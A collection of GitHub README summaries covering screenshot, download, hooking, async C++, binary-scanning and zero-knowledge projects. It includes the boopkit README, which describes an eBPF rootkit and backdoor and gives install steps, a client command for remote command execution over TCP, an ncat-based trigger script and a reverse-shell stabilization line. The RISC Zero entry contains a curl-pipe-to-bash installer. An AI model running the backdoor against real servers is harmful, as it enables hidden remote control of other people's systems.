simonw/shot-scraper;shot-scraper A command-line utility for taking automated screenshots of websites For background on this project see shot-scraper: automated screenshots for documentation, built on Playwright . Documentation Full documentation for shot-scraper Tutorial: Automating screenshots for the Datasette documentation using shot-scraper Release notes Get started with GitHub Actions To get started without installing any software, use the shot-scraper-template template to create your own GitHub repository which takes screenshots of a page using shot-scraper . See Instantly create a GitHub repository to take screenshots of a web page for details. Quick installation You can install the shot-scraper CLI tool using pip : pip install shot-scraper # Now install the browser it needs: shot-scraper install Taking your first screenshot You can take a screenshot of a web page like this: shot-scraper https://datasette.io/ This will create a screenshot in a file called datasette-io.png . Many more options are available, see Taking a screenshot for details. Examples The shot-scraper-demo repository uses this tool to capture recently spotted owls in El Granada, CA according to this page , and to generate an annotated screenshot illustrating a Datasette feature as described in my blog . The Datasette Documentation uses screenshots taken by shot-scraper running in the simonw/datasette-screenshots GitHub repository, described in detail in Automating screenshots for the Datasette documentation using shot-scraper . Ben Welsh built @newshomepages , a Twitter bot that uses shot-scraper and GitHub Actions to take screenshots of news website homepages and publish them to Twitter. The code for that lives in palewire/news-homepages . scrape-hacker-news-by-domain uses shot-scraper javascript to scrape a web page. See Scraping web pages from the command-line with shot-scraper for details of how this works. Reuters uses shot-scraper to generate regularly updating data dashboards for email newsletters .;A command-line utility for taking automated screenshots of websites;playwright,playwright-python,scraping,screenshot-utility,screenshots
simonw/shot-scraper
HFrost0/bilix;bilix ⚡️Lightning-fast asynchronous download tool for bilibili and more Features ⚡️ Fast & Async Asynchronous high concurrency support, controllable concurrency and speed settings. 😉 Lightweight & User-friendly Lightweight user-friendly CLI with progress notification, focusing on core functionality. 📝 Fully-featured Submissions, anime, TV Series, video clip, audio, favourite, danmaku ,cover... 🔨 Extensible Extensible Python module suitable for more download scenarios. Install shell pip install bilix for macOS, you can also install bilix by brew shell brew install bilix Usage Example If you prefer to use command line interface (cli) shell bilix v 'url' v is a method short alias for get_video If you prefer to code with python ```python from bilix.sites.bilibili import DownloaderBilibili import asyncio async def main(): async with DownloaderBilibili() as d: await d.get_video('url') asyncio.run(main()) ``` Community If you find any bugs or other issues, feel free to raise an Issue . If you have new ideas or new feature requests👍,welcome to participate in the Discussion If you find this project helpful, you can support the author by Star 🌟 Contribute ❤️ Welcome! Details can be found in Contributing;⚡️Lightning-fast async download tool for bilibili and more;async,cli,download,python,asyncio,m3u8
HFrost0/bilix
bytedance/android-inline-hook;ShadowHook 简体中文 ShadowHook is an Android inline hook library which supports thumb, arm32 and arm64. ShadowHook is now used in TikTok, Douyin, Toutiao, Xigua Video, Lark. If you need an Android PLT hook library, please move to ByteHook . Features Support Android 4.1 - 14 (API level 16 - 34). Support armeabi-v7a and arm64-v8a. Support hook for the whole function, but does not support hook for the middle position of the function. Support to specify the hook location by "function address" or "library name + function name". Automatically complete the hook of "newly loaded dynamic library" (only "library name + function name"), and call the optional callback function after the hook is completed. Multiple hooks and unhooks can be executed concurrently on the same hook point without interfering with each other (only in shared mode). Automatically avoid possible recursive calls and circular calls between proxy functions (only in shared mode). The proxy function supports unwinding backtrace in a normal way (CFI, EH, FP). Integrated symbol address search function. MIT licensed. Documentation ShadowHook Manual Quick Start You can refer to the sample app in app module , or refer to the hook/unhook examples of commonly used system functions in systest module . 1. Add dependency in build.gradle ShadowHook is published on Maven Central , and uses Prefab package format for native dependencies , which is supported by Android Gradle Plugin 4.0+ . ```Gradle android { buildFeatures { prefab true } } dependencies { implementation 'com.bytedance.android:shadowhook:1.0.9' } ``` Note : ShadowHook uses the prefab package schema v2 , which is configured by default since Android Gradle Plugin 7.1.0 . If you are using Android Gradle Plugin earlier than 7.1.0, please add the following configuration to gradle.properties : android.prefabVersion=2.0.0 2. Add dependency in CMakeLists.txt or Android.mk CMakeLists.txt ```CMake find_package(shadowhook REQUIRED CONFIG) add_library(mylib SHARED mylib.c) target_link_libraries(mylib shadowhook::shadowhook) ``` Android.mk ``` include $(CLEAR_VARS) LOCAL_MODULE := mylib LOCAL_SRC_FILES := mylib.c LOCAL_SHARED_LIBRARIES += shadowhook include $(BUILD_SHARED_LIBRARY) $(call import-module,prefab/shadowhook) ``` 3. Specify one or more ABI(s) you need Gradle android { defaultConfig { ndk { abiFilters 'armeabi-v7a', 'arm64-v8a' } } } 4. Add packaging options If you are using ShadowHook in an SDK project, you may need to avoid packaging libshadowhook.so into your AAR, so as not to encounter duplicate libshadowhook.so file when packaging the app project. Gradle android { packagingOptions { exclude '**/libshadowhook.so' } } On the other hand, if you are using ShadowHook in an APP project, you may need to add some options to deal with conflicts caused by duplicate libshadowhook.so file. Gradle android { packagingOptions { pickFirst '**/libshadowhook.so' } } 5. Initialize ShadowHook supports two modes (shared mode and unique mode). The proxy function in the two modes is written slightly differently. You can try the unique mode first. ```Java import com.bytedance.shadowhook.ShadowHook; public class MySdk { public static void init() { ShadowHook.init(new ShadowHook.ConfigBuilder() .setMode(ShadowHook.Mode.UNIQUE) .build()); } } ``` 6. Hook and Unhook ```C include "shadowhook.h" void shadowhook_hook_func_addr( void func_addr, void new_addr, void *orig_addr); void shadowhook_hook_sym_addr( void sym_addr, void new_addr, void *orig_addr); void shadowhook_hook_sym_name( const char lib_name, const char sym_name, void new_addr, void **orig_addr); typedef void ( shadowhook_hooked_t)( int error_number, const char lib_name, const char sym_name, void sym_addr, void new_addr, void orig_addr, void *arg); void shadowhook_hook_sym_name_callback( const char lib_name, const char sym_name, void new_addr, void * orig_addr, shadowhook_hooked_t hooked, void hooked_arg); int shadowhook_unhook(void *stub); ``` shadowhook_hook_func_addr : hook a function (which has no symbol info in ELF) by absolute address. shadowhook_hook_sym_addr : hook a function (which has symbol info in ELF) by absolute address. shadowhook_hook_sym_name : hook a function by symbol name and ELF file name or path name. shadowhook_hook_sym_name_callback : Similar to shadowhook_hook_sym_name , but the specified callback function will be called after the hook is completed. shadowhook_unhook : unhook. For example, let's try to hook art::ArtMethod::Invoke : ```C void orig = NULL; void stub = NULL; typedef void ( type_t)(void , void , uint32_t , uint32_t, void , const char ); void proxy(void thiz, void thread, uint32_t args, uint32_t args_size, void result, const char *shorty) { // do something ((type_t)orig)(thiz, thread, args, args_size, result, shorty); // do something } void do_hook() { stub = shadowhook_hook_sym_name( "libart.so", "_ZN3art9ArtMethod6InvokeEPNS_6ThreadEPjjPNS_6JValueEPKc", (void )proxy, (void *)&orig); if(stub == NULL) { int err_num = shadowhook_get_errno(); const char *err_msg = shadowhook_to_errmsg(err_num); LOG("hook error %d - %s", err_num, err_msg); } } void do_unhook() { shadowhook_unhook(stub); stub = NULL; } ``` _ZN3art9ArtMethod6InvokeEPNS_6ThreadEPjjPNS_6JValueEPKc is the function symbol name of art::ArtMethod::Invoke processed by C++ Name Mangler in libart.so. You can use readelf to view it. The C function does not have the concept of Name Mangler. The symbol name of art::ArtMethod::Invoke is different in previous versions of Android M. This example is only applicable to Android M and later versions. If you want to achieve better Android version compatibility, you need to handle the difference in function symbol names yourself. Contributing Code of Conduct Contributing Guide Reporting Security vulnerabilities License ShadowHook is licensed by MIT License . ShadowHook uses the following third-party source code or libraries: queue.h BSD 3-Clause License Copyright (c) 1991, 1993 The Regents of the University of California. tree.h BSD 2-Clause License Copyright (c) 2002 Niels Provos provos@citi.umich.edu linux-syscall-support BSD 3-Clause License Copyright (c) 2005-2011 Google Inc. xDL MIT License Copyright (c) 2020-2023 HexHacking Team;:fire: ShadowHook is an Android inline hook library which supports thumb, arm32 and arm64.;android,inline,hook,inlinehook,androidinlinehook,arm,arm64,thumb,security,ndk
bytedance/android-inline-hook
alibaba/async_simple;async_simple A Simple, Light-Weight Asynchronous C++ Framework English | 中文 async_simple is a library offering simple, light-weight and easy-to-use components to write asynchronous code. The components offered include Lazy (based on C++20 stackless coroutine), Uthread (based on stackful coroutine) and the traditional Future/Promise. Quick Experience We can try async_simple online in compiler-explorer : https://compiler-explorer.com/z/Tdaesqsqj . Note that Uthread cannot be use in compiler-explorer since it requires installation. Get Started Our documents are hosted by GitHub Pages, go to Get Started . After installing and reading Lazy to get familiar with API, here is a demo use Lazy to count char in a file. Install async_simple By Vcpkg vcpkg is a cross-platform package manager . ./vcpkg install async-simple By Cmake git clone -b main --single-branch --depth 1 https://github.com/alibaba/async_simple.git cd async_simple mkdir build cd build cmake .. -DASYNC_SIMPLE_ENABLE_TESTS=OFF -DASYNC_SIMPLE_BUILD_DEMO_EXAMPLE=OFF -DASYNC_SIMPLE_ENABLE_ASAN=OFF cmake --build . cmake --install . # --prefix ./user_defined_install_path Import async_simple After install async_simple, you can import it to your project. By cmake find_package please add those cmake codes: cmake find_package(async_simple REQUIRED) target_link_libraries(<your-target-name> PRIVATE async_simple::async_simple) # dynamic_link # async_simple::async_simple_header_only # async_simple::async_simple_static <your-target-name> is the target name which want to use async_simple Manully async_simple is almost header-only. So you can just pass the include path of the install position to your compiler. But the uthread part of async_simple is not head-only. If you want to use uthread, You need link it manully. The library file is in the install path. Compiler Requirement Required Compiler: clang (>= 10.0.0) or gcc (>= 10.3) or Apple-clang (>= 14) Note that we need to add the -Wno-maybe-uninitialized option when we use gcc 12 due to a false positive diagnostic message by gcc 12 If you're using async_simple::Generator , there may be some compiler bugs in clang15. We suggest to use clang17 or higher for that. If you meet any problem about MSVC Compiler Error C4737. Try to add the /EHa option to fix the problem. Develop async_simple The build of async_simple requires libaio, googletest and cmake. Both libaio and googletest are optional. (Testing before using is highly suggested.) By default, async_simple would try to clone the googletest from git to make sure the version used is correct. But in case the users have problems with networks, users can try to install the gtest libraries by the following instructions and use the CMake variables ('GMOCK_INCLUDE_DIR', 'GTEST_LIBRARIES', 'GMOCK_INCLUDE_DIR', 'GMOCK_LIBRARIES') to specify the location. Using apt (Ubuntu and Debian) ```bash Install libaio sudo apt install libaio-dev -y Install cmake sudo apt install cmake -y Install bazel See: https://bazel.build/install/ubuntu - Use `apt` to install gtest and gmock bash sudo apt install -y libgtest-dev libgmock-dev ``` Try to build gtest and gmock from source ```bash Install gtest sudo apt install libgtest-dev -y sudo apt install cmake -y cd /usr/src/googletest/gtest sudo mkdir build && cd build sudo cmake .. && sudo make install cd .. && sudo rm -rf build cd /usr/src/googletest/gmock sudo mkdir build && cd build sudo cmake .. && sudo make install cd .. && sudo rm -rf build Install bazel See: https://bazel.build/install/ubuntu ``` Using yum (CentOS and Fedora) ```bash Install libaio sudo yum install libaio-devel -y - Use `yum` to install gtest, gmock sudo yum install gtest-devel gmock-devel ``` - Try to build gtest and gmock from source Using Pacman (Arch) ```bash Optional sudo pacman -S libaio Use cmake to build project sudo pacman -S cmake gtest Use bazel to build project sudo pacman -S bazel ``` Using Homebrew (macOS) ```bash Use cmake to build project brew install cmake brew install googletest Use bazel to build project brew install bazel ``` Windows ```powershell Install cmake winget install cmake Install google-test TODO Install bazel See: https://bazel.build/install/windows ``` Build Dependencies From Source ``` libaio (optional) you can skip this if you install libaio from packages git clone https://pagure.io/libaio.git cd libaio sudo make install gmock and gtest git clone git@github.com:google/googletest.git -b v1.8.x cd googletest mkdir build && cd build cmake .. && sudo make install ``` Demo example dependency Demo example depends on standalone asio(https://github.com/chriskohlhoff/asio/tree/master/asio), the commit id:f70f65ae54351c209c3a24704624144bfe8e70a3 Build cmake ```bash $ mkdir build && cd build Specify [-DASYNC_SIMPLE_ENABLE_TESTS=OFF] to skip tests. Specify [-DASYNC_SIMPLE_BUILD_DEMO_EXAMPLE=OFF] to skip build demo example. Specify [-DASYNC_SIMPLE_DISABLE_AIO=ON] to skip the build libaio CXX=clang++ CC=clang cmake ../ -DCMAKE_BUILD_TYPE=[Release|Debug] [-DASYNC_SIMPLE_ENABLE_TESTS=OFF] [-DASYNC_SIMPLE_BUILD_DEMO_EXAMPLE=OFF] [-DASYNC_SIMPLE_DISABLE_AIO=ON] [-DGMOCK_INCLUDE_DIR= -DGTEST_INCLUDE_DIR= -DGTEST_LIBRARIES= -DGMOCK_LIBRARIES= ] for gcc, use CXX=g++ CC=gcc make -j4 make test # optional make install # sudo if required ``` Conan is also supported. You can install async_simple to conan local cache. mkdir build && cd build conan create .. bazel ```bash Specify [--define=ASYNC_SIMPLE_DISABLE_AIO=true] to skip the build libaio Example bazel build --define=ASYNC_SIMPLE_DISABLE_AIO=true ... bazel build ... # compile all target bazel build ...:all # compile all target bazel build ...:* # compile all target bazel build -- ... -benchmarks/... # compile all target except those beneath benchmarks bazel test ... # compile and execute tests Specify compile a target Format: bazel [build|test|run] [directory name]:[binary name] Example bazel build :async_simple # only compile libasync_simple bazel run benchmarks:benchmarking # compile and run benchmark bazel test async_simple/coro/test:async_simple_coro_test Use clang toolchain bazel build --action_env=CXX=clang++ --action_env=CC=clang ... Add compile option bazel build --copt='-O0' --copt='-ggdb' ... `` - See [this](https://bazel.build/run/build) get more infomation - ... Indicates recursively scan all targets, recognized as ../.. in oh-my-zsh , can be replaced by other shell or bash -c 'commond' to run, such as bash -c 'bazel build' ... or use bazel build ...:all - Use async_simple` as a dependency, see also bazel support Docker Compile Environment git clone https://github.com/alibaba/async_simple.git cd async_simple/docker/(ubuntu|centos7|rockylinux) docker build . --no-cache -t async_simple:1.0 docker run -it --name async_simple async_simple:1.0 /bin/bash Performance We also give a Quantitative Analysis Report of Lazy (based on C++20 stackless coroutine) and Uthread (based on stackful coroutine). C++20 Modules Support We have experimental support for C++20 Modules in modules/async_simple.cppm . We can build the async_simple module by xmake and cmake . We can find the related usage in CountChar , ReadFiles , LazyTest.cpp and FutureTest.cpp . We need clang (>= d18806e6733 or simply clang 16) to build the async_simple module. It is only tested for libstdc++10.3. Due to the current support status for C++20, it won't be a surprise if the compilation fails in higher versions of STL. We can build the async_simple module with xmake (>= 0eccc6e) using the commands: xmake We can build the async_simple module with cmake (>= d18806e673 or cmake 3.26 and up) using the following commands: mkdir build_modules && cd build_modules CC=clang CXX=clang++ cmake .. -DCMAKE_BUILD_TYPE=Release -DASYNC_SIMPLE_BUILD_MODULES=ON -GNinja ninja Note that the async_simple module in the main branch is actually a named module's wrapper for headers for compatability. We can find the practical usage of C++20 Modules in https://github.com/alibaba/async_simple/tree/CXX20Modules, which contains the support for xmake and cmake as well. Questions For questions, we suggest to read docs , issues and discussions first. If there is no satisfying answer, you could file an issues or start a thread in discussions . Specifically, for defect report or feature enhancement, it'd be better to file an issues . And for how-to-use questions, it'd be better to start a thread in discussions . How to Contribute Read the How to fix issue document firstly. Run tests and git-clang-format HEAD^ locally for the change. Note that the version of clang-format in CI is clang-format 14. So that it is possible your local format result is inconsistency with the format result in the CI. In the case, you need to install the new clang-format or adopt the suggested change by hand. In case the format result is not good, it is OK to accept the PR temporarily and file an issue for the clang-formt. Create a PR, fill in the PR template. Choose one or more reviewers from contributors: (e.g., ChuanqiXu9, RainMark, foreverhy, qicosmos). Get approved and merged. License async_simple is distributed under the Apache License (Version 2.0) This product contains various third-party components under other open source licenses. See the NOTICE file for more information.;Simple, light-weight and easy-to-use asynchronous components ;asynchronous,coroutines,cpp20,modules,cpp20-modules
alibaba/async_simple
KeenSecurityLab/BinAbsInspector;What is BinAbsInspector? BinAbsInspector (Binary Abstract Inspector) is a static analyzer for automated reverse engineering and scanning vulnerabilities in binaries, which is a long-term research project incubated at Keenlab . It is based on abstract interpretation with the support from Ghidra. It works on Ghidra's Pcode instead of assembly. Currently it supports binaries on x86,x64, armv7 and aarch64. Installation Install Ghidra according to Ghidra's documentation Install Z3 (tested version: 4.8.15) Note that generally there are two parts for Z3 library: one is Java package, the other one is native library. The Java package is already included in "/lib" directory, but we suggest that you replace it with your own Java package for version compatibility. For Windows, download a pre-built package from here , extract the zip file and add a PATH environment variable pointing to z3-${version}-win/bin For Linux, install with package manager is NOT recommended, there are two options: You can download suitable pre-build package from here , extract the zip file and copy z3-${version}-glibc-${version}/bin/*.so to /usr/local/lib/ or you can build and install z3 according to Building Z3 using make and GCC/Clang For MacOS, it is similar to Linux. Download the extension zip file from release page Install the extension according to Ghidra Extension Notes Building Build the extension by yourself, if you want to develop a new feature, please refer to development guide . + Install Ghidra and Z3 + Install Gradle 7.x (tested version: 7.4) + Pull the repository + Run gradle buildExtension under repository root + The extension will be generated at dist/${GhidraVersion}_${date}_BinAbsInspector.zip Usage You can run BinAbsInspector in headless mode, GUI mode, or with docker. With Ghidra headless mode. $GHIDRA_INSTALL_DIR/support/analyzeHeadless <projectPath> <projectName> -import <file> -postScript BinAbsInspector "@@<scriptParams>" <projectPath> -- Ghidra project path. <projectName> -- Ghidra project name. <scriptParams> -- The argument for our analyzer, provides following options: | Parameter | Description | | ----------------------------------------- | --------------------------------------| | [-K <kElement>] | KSet size limit K | | [-callStringK <callStringMaxLen>] | Call string maximum length K | | [-Z3Timeout <timeout>] | Z3 timeout | | [-timeout <timeout>] | Analysis timeout | | [-entry <address>] | Entry address | | [-externalMap <file>] | External function model config | | [-json] | Output in json format | | [-disableZ3] | Disable Z3 | | [-all] | Enable all checkers | | [-debug] | Enable debugging log output | | [-check "<cweNo1>[;<cweNo2>...]"] | Enable specific checkers | With Ghidra GUI Run Ghidra and import the target binary into a project Analyze the binary with default settings When the analysis is done, open Window -> Script Manager and find BinAbsInspector.java Double-click on BinAbsInspector.java entry, set the parameters in configuration window and click OK When the analysis is done, you can see the CWE reports in console window, double-click the addresses from the report can jump to corresponding address With Docker shell git clone git@github.com:KeenSecurityLab/BinAbsInspector.git cd BinAbsInspector docker build . -t bai docker run -v $(pwd):/data/workspace bai "@@<script parameters>" -import <file> Implemented Checkers So far BinAbsInspector supports following checkers: CWE78 (OS Command Injection) CWE119 (Buffer Overflow (generic case)) CWE125 (Buffer Overflow (Out-of-bounds Read)) CWE134 (Use of Externally-Controlled Format string) CWE190 (Integer overflow or wraparound) CWE367 (Time-of-check Time-of-use (TOCTOU)) CWE415 (Double free) CWE416 (Use After Free) CWE426 (Untrusted Search Path) CWE467 (Use of sizeof() on a pointer type) CWE476 (NULL Pointer Dereference) CWE676 (Use of Potentially Dangerous Function) CWE787 (Buffer Overflow (Out-of-bounds Write)) Project Structure The structure of this project is as follows, please refer to technical details or the Chinese version article for more details. ├── main │ ├── java │ │ └── com │ │ └── bai │ │ ├── checkers checker implementatiom │ │ ├── env │ │ │ ├── funcs function modeling │ │ │ │ ├── externalfuncs external function modeling │ │ │ │ └── stdfuncs cpp std modeling │ │ │ └── region memory modeling │ │ ├── solver analyze core and grpah module │ │ └── util utilities │ └── resources └── test You can also build the javadoc with gradle javadoc , the API documentation will be generated in ./build/docs/javadoc . Acknowledgement We employ Ghidra as our foundation and frequently leverage JImmutable Collections for better performance. Here we would like to thank them for their great help!;BinAbsInspector: Vulnerability Scanner for Binaries;binary-analysis,ghidra,reverse-engineering,security,static-analyzer,vulnerability-scanner,abstract-interpretation
KeenSecurityLab/BinAbsInspector
risc0/risc0;[!IMPORTANT] main is the development branch. When building applications or running examples, use the latest release instead. RISC Zero is a zero-knowledge verifiable general computing platform based on zk-STARKs and the RISC-V microarchitecture. A zero knowledge proof allows one party (the prover) to convince another party (the verifier) that something is true without revealing all the details. In the case of RISC Zero, the prover can show they correctly executed some code (known to both parties), while only revealing to the verifier the output of the code, not any of its inputs or any state during execution. The code runs in a special virtual machine, called a zkVM . The RISC Zero zkVM emulates a small RISC-V computer, allowing it to run arbitrary code in any language, so long as a compiler toolchain exists that targets RISC-V. Currently, SDK support exists for Rust, C, and C⁠+⁠+. Protocol overview and terminology First, the code to be proven must be compiled from its implementation language into a method . A method is represented by a RISC-V ELF file with a special entry point that runs the code of the method. Additionally, one can compute for a given method its image ID which is a special type of cryptographic hash of the ELF file, and is required for verification. Next, the host program runs and proves the method inside the zkVM. The logical RISC-V machine running inside the zkVM is called the guest and the prover running the zkVM is called the host . The guest and the host can communicate with each other during the execution of the method, but the host cannot modify the execution of the guest in any way, or the proof being generated will be invalid. During execution, the guest code can write to a special append-only log called the journal which represents the official output of the computation. Presuming the method terminated correctly, a receipt is produced, which provides the proof of correct execution. This receipt consists of 2 parts: the journal written during execution and a blob of opaque cryptographic data called the seal . The verifier can then verify the receipt and examine the log. If any tampering was done to the journal or the seal, the receipt will fail to verify. Additionally, it is cryptographically infeasible to generate a valid receipt unless the output of the journal is the exactly correct output for some valid execution of the method whose image ID matches the receipt. In summary, the receipt acts as a zero-knowledge proof of correct execution. Because the protocol is zero-knowledge, the verifier cannot infer anything about the details of the execution or any data passed between the host and the guest (aside from what is implied by the data written to the journal and the correct execution of the code). Security This code implements a three-layer recursive proof system , based on the well-studied zk-STARK protocol and Groth16 protocol. An overview of the underlying cryptographic assumptions can be found on our Security Model page. With default parameters, this system achieves perfect zero-knowledgeness and 98 bits of conjectured security. Our STARK protocol is described in Scalable, Transparent Arguments of RISC-V Integrity , and a soundness/security calculator is included in the soundness.rs file. To run the calculator, use RUST_LOG=risc0_zkp=debug when running a proof. Getting Started To start your own project, you can use our cargo risczero tool to write the initial boilerplate and set up a standard directory structure. First, install Rust if you don't already have it, then install the RISC Zero toolchain installer, rzup . We'll use rzup to install cargo-risczero . To install rzup run the following command and follow the instructions: bash curl -L https://risczero.com/install | bash Next we can install the RISC Zero toolchain by running rzup : bash rzup You can verify the installation was successful by running: bash cargo risczero --version After installation, you can create a new project (named my_project in this example): bash cargo risczero new my_project More details and options for cargo risczero are given in its README . For more guidance on how to use RISC Zero, how RISC Zero projects are typically structured, and other resources useful to developers new to RISC Zero, see our Getting Started page . Building from source Building from source requires some additional tools and steps. Please refer to CONTRIBUTING.md for the full instructions. Rust Binaries | crate | crates.io | | -------------- | --------------------------------------------------------------------------------------------------- | | cargo-risczero | | | risc0-r0vm | | | risc0-tools | | Rust Libraries | crate | crates.io | docs.rs | | --------------------------- | ---------------------------------------------------------------------------------------------------------------- | ------------------------------------------------------------------------------------------------------------- | | bonsai-sdk | | | | risc0-binfmt | | | | risc0-build | | | | risc0-build-kernel | | | | risc0-circuit-recursion | | | | risc0-circuit-recursion-sys | | | | risc0-circuit-rv32im | | | | risc0-circuit-rv32im-sys | | | | risc0-core | | | | risc0-groth16 | | | | risc0-sys | | | | risc0-zkp | | | | risc0-zkvm | | | | risc0-zkvm-platform | | | Feature flags The following feature flags are present in one or more of the crates listed above: | Feature | Target(s) | Implies | Description | Crates | | ---------------- | ----------------- | ---------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------ | -------------------------------------------------------------------- | | client | all except rv32im | std | Enables the client API. | risc0-zkvm | | cuda | | prove, std | Enables CUDA GPU acceleration for the prover. Requires CUDA toolkit to be installed. | risc0-circuit-recursion, risc0-circuit-rv32im, risc0-zkp, risc0-zkvm | | disable-dev-mode | all except rv32im | | Disables dev mode so that proving and verifying may not be faked. Used to prevent a misplaced RISC0_DEV_MODE from breaking security in production systems. | risc0-zkvm | | metal | macos | prove, std | Enables Metal GPU acceleration for the prover. | risc0-circuit-recursion, risc0-circuit-rv32im, risc0-zkp, risc0-zkvm | | prove | all except rv32im | std | Enables the prover, incompatible within the zkvm guest. | risc0-circuit-recursion, risc0-circuit-rv32im, risc0-zkp, risc0-zkvm | | std | all | | Support for the Rust stdlib. | risc0-circuit-recursion, risc0-circuit-rv32im, risc0-zkp, risc0-zkvm | License This project is licensed under the Apache2 license. See LICENSE .;RISC Zero is a zero-knowledge verifiable general computing platform based on zk-STARKs and the RISC-V microarchitecture.;stark,zero-knowledge,virtual-machine,risc-v,cryptography,rust
risc0/risc0
krisnova/boopkit;``` ██████╗ ██████╗ ██████╗ ██████╗ ██╗ ██╗██╗████████╗ ██╔══██╗██╔═══██╗██╔═══██╗██╔══██╗██║ ██╔╝██║╚══██╔══╝ ██████╔╝██║ ██║██║ ██║██████╔╝█████╔╝ ██║ ██║ ██╔══██╗██║ ██║██║ ██║██╔═══╝ ██╔═██╗ ██║ ██║ ██████╔╝╚██████╔╝╚██████╔╝██║ ██║ ██╗██║ ██║ ╚═════╝ ╚═════╝ ╚═════╝ ╚═╝ ╚═╝ ╚═╝╚═╝ ╚═╝ Author: Kris Nóva <kris@nivenly.com> Version 1.4.0 IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES. DO NOT ATTEMPT TO USE THE TOOLS TO VIOLATE THE LAW. THE AUTHOR IS NOT RESPONSIBLE FOR ANY ILLEGAL ACTION. MISUSE OF THE SOFTWARE, INFORMATION, OR SOURCE CODE MAY RESULT IN CRIMINAL CHARGES. Use at your own risk. ================================================================ Boopkit. Linux rootkit and backdoor. Built using eBPF. Usage: boopkit [options] Options: -h, help Display help and usage for boopkit. -i, interface Interface name. lo, eth0, wlan0, etc -s, sudo-bypass Bypass sudo check. Breaks PID obfuscation. -r, reverse-conn Attempt a reverse RCE lookup if no payload found. -q, quiet Disable output. -x, reject Source addresses to reject triggers from. ``` Linux backdoor, rootkit, and eBPF bypass tools. Remote command execution over raw TCP. Tested on Linux kernel 5.16 Tested on Linux kernel 5.17 Remote code execution over TCP (SSH, Nginx, Kubernetes, etc) Network gateway bypass (bad checksums, TCP reset) Self obfuscation at runtime (eBPF process hiding) Disclaimer This is NOT an exploit! This requires prior privileged access on a server in order to work! I am a professional security researcher. These are white hat tools used for research purposes only. Use this responsibly. Never use this software illegally. Server Side Download and build boopkit. bash wget https://github.com/kris-nova/boopkit/archive/refs/tags/v1.3.0.tar.gz tar -xzf v1.3.0.tar.gz cd boopkit-1.3.0/ make sudo make install Run boopkit in the foreground. ```bash Reject all boops on localhost and 10.0.0.1 boopkit -x 127.0.0.1 -x 10.0.0.1 ``` Run boopkit in the background in quiet mode. ```bash Danger! This can be VERY hard to stop! Run this at your own risk! boopkit -q & ``` Boopkit is now running and can be exploited using the client boopkit-boop command line tool. Client Side Download and build boopkit. bash wget https://github.com/kris-nova/boopkit/archive/refs/tags/v1.2.0.tar.gz tar -xzf v1.2.0.tar.gz cd boopkit-1.2.0/ make sudo make install Run boopkit-boop against the server. ```bash =================== RCE="ls -la" =================== LHOST="127.0.0.1" LPORT="3535" RHOST="127.0.0.1" RPORT="22" boopkit-boop \ -lhost $LHOST \ -lport $LPORT \ -rhost $RHOST \ -rport $RPORT \ -c "$RCE" ``` Boop Vectors Boopkit will respond to various events on the network. Both of which can be triggered with the boopkit-boop tool. TCP Header Format. Taken from RFC 793 . September 1981 0 1 2 3 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Source Port | Destination Port | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Sequence Number | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Acknowledgment Number | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Data | |U|A|P|R|S|F| | | Offset| Reserved |R|C|S|S|Y|I| Window | | | |G|K|H|T|N|N| | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Checksum | Urgent Pointer | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Options | Padding | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ { data } { .... } { data } +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ 1. Bad Checksum First the boopkit-boop tool will send a malformed TCP SYN packet with an empty checksum to the server over a SOCK_RAW socket. This will trigger boopkit remotely regardless of what TCP services are running. This works against any Linux server running boopkit, regardless of the state of TCP services. Use -p with boopkit-boop to only use this first vector. ⚠️ Some modern network hardware will DROP all malformed checksum packets such as the one required to exploit boopkit using this vector! 2. Sending ACK-RST packet Next the boopkit-boop tool will complete a valid TCP handshake with a SOCK_STREAM socket against a remote TCP service such as SSH, Kubernetes, Nginx, etc. After the initial TCP handshake is complete, boopkit-boop will repeat the process a 2nd time. The 2nd handshake will flip the TCP reset flag in the packet, trigger a TCP reset on the server. Either of these tactics are enough to independently trigger boopkit. Various network hardware and runtime conditions will make either tactic more viable. Boopkit will try both, and respond to both by default. Boopscript The boopscript file is a Metasploit compatible script that can be used to remotely trigger the boopkit backdoor after boopkit-boop is installed on a remote Linux machine. ```bash boopscript RHOST="127.0.0.1" RPORT="22" LHOST="127.0.0.1" LPORT="3535" NCAT="/usr/bin/ncat" NCATLISTENPORT="3545" ``` Compile Time Dependencies 'clang' 'bpftool' Required for libbpf 'xdp-tools' Required for libxdp 'llvm' 'pcap' 'lib32-glibc' Reverse Shell Stabilization bash python -c "import pty; pty.spawn('/bin/bash')" References Tracepoints with BPF Raw TCP Sockets Bad BPF Credit to the original authors for their helpful code samples! I forked a lot of code for this project!;Linux eBPF backdoor over TCP. Spawn reverse shells, RCE, on prior privileged access. Less Honkin, More Tonkin.;tcp,linux-kernel-hacking,ebpf,security
krisnova/boopkit
